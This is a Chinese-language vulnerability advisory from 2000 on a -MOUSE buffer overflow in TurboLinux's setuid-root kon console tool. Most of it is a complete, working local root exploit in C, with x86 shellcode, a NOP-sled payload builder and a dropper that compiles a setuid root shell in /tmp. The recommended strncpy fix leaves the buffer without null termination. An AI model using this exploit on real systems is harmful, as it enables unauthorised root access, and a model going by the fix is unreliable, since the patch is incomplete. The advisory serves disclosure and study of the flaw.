发布日期：2000-05-11
更新日期：2000-05-11

受影响系统：

TurboLinux1.0 / kon2-0.3.7-3.i386.rpm
TurboLinux2.0 / kon2-0.3.8-10TL.i386.rpm
TurboLinux3.0 / kon2-0.3.8-11TL.i386.rpm
TurboLinux4.2 / kon2-0.3.8-13.i386.rpm
TurboLinux4.2 / kon2-0.3.8-13.i386.rpm

描述：

---

/usr/bin/kon是一个控制台显示工具。它被设置了suid root位。当给它的-MOUSE传递
一个很长的字符串时，将导致它发生缓冲区溢出。本地用户可以获得root权限。


问题出在 -MOUSE接收参数的处理代码部分，src/mouse.c中的ConfigMouse()函数中：

<....>
static int  ConfigMouse(const char *config)
{
    struct mouseconf *p;
    char name[MAX_COLS]; <--- 固定大小的缓冲区

    mouseType = MOUSE_NONE;
    mInfo.has_mouse = FALSE;
    sscanf(config, "%s", name);
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     这里将导致溢出发生

            DefineCap("MouseDev", ConfigMouseDev, "/dev/mouse");
            return SUCCESS;
        }
    }
    warn("unknown mouse type `%s' ignored; assuming no mouse\r\n", name);
    return SUCCESS;
}
<....>

<* 来源: UNYUN <shadowpenguin@backsection.net>
         http://shadowpenguin.backsection.net
*>         


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*We (ShadowPenguinSecurity) found the security vulnerability in
/usr/bin/kon which are installed
on Turbo Linux series by default. This is a suid program, it overflows if
the long argment
is specified with -MOUSE option. I (Unyun) coded an exploit for the Linux,
the local user can
obtain a root privilege
*/

/*==========================================================================
===
   Linux kon/kon2 Exploit for Linux
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by  UNYUN  (shadowpenguin@backsection.net)

============================================================================
=
*/
#include <stdlib.h>
#include <stdio.h>

#define KON_PATH "/usr/bin/kon"
#define RET_ADR  260
#define JMP_OFS  0x2474
#define CODE_OFS 320
#define MAXBUF   8000
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"

char exec[80]=
  "\xeb\x31\x5e\x89\x76\x08\x31\xc0\x31\xd2\xb2\x04\x88\x46\x07\x01"
  "\xd6\x89\x46\x08\x29\xd6\xb0\x08\xfe\xc0\xfe\xc0\xfe\xc0\x89\xf3"
  "\x8d\x4e\x08\x01\xd6\x8d\x56\x08\x29\xd6\xcd\x80\x31\xdb\x89\xd8"
  "\x40\xcd\x80\xe8\xca\xff\xff\xff";  // for kon/kon2 exploit

char            xx[MAXBUF+1];
unsigned int    i,ip,sp;
FILE            *fp;

unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

main(int argc,char *argv[])
{

    strcat(exec,SHELL);
    sprintf(xx,"%s.c",SHELL);
    if ((fp=fopen(xx,"w"))==NULL){
        printf("Can not write to %s\n",xx);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
    fclose(fp);
    sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(xx);

    sp=get_sp();
    printf("ESP = %x\n",sp);
    memset(xx,NOP,MAXBUF);

    ip=sp-JMP_OFS;
    xx[RET_ADR  ]=ip&0xff;
    xx[RET_ADR+1]=(ip>>8)&0xff;
    xx[RET_ADR+2]=(ip>>16)&0xff;
    xx[RET_ADR+3]=(ip>>24)&0xff;

    strncpy(xx+CODE_OFS,exec,strlen(exec));
    xx[MAXBUF-1]=0;
    execl(KON_PATH,"kon","-MOUSE",xx,(char *) 0);
}


建议：

---

临时解决方法：
将 sscanf(config, "%s", name);
用下列语句替换：

strncpy(name,config,MAX_COLS);

重新编译kon程序。


浏览次数：6204
严重程度：0（网友投票）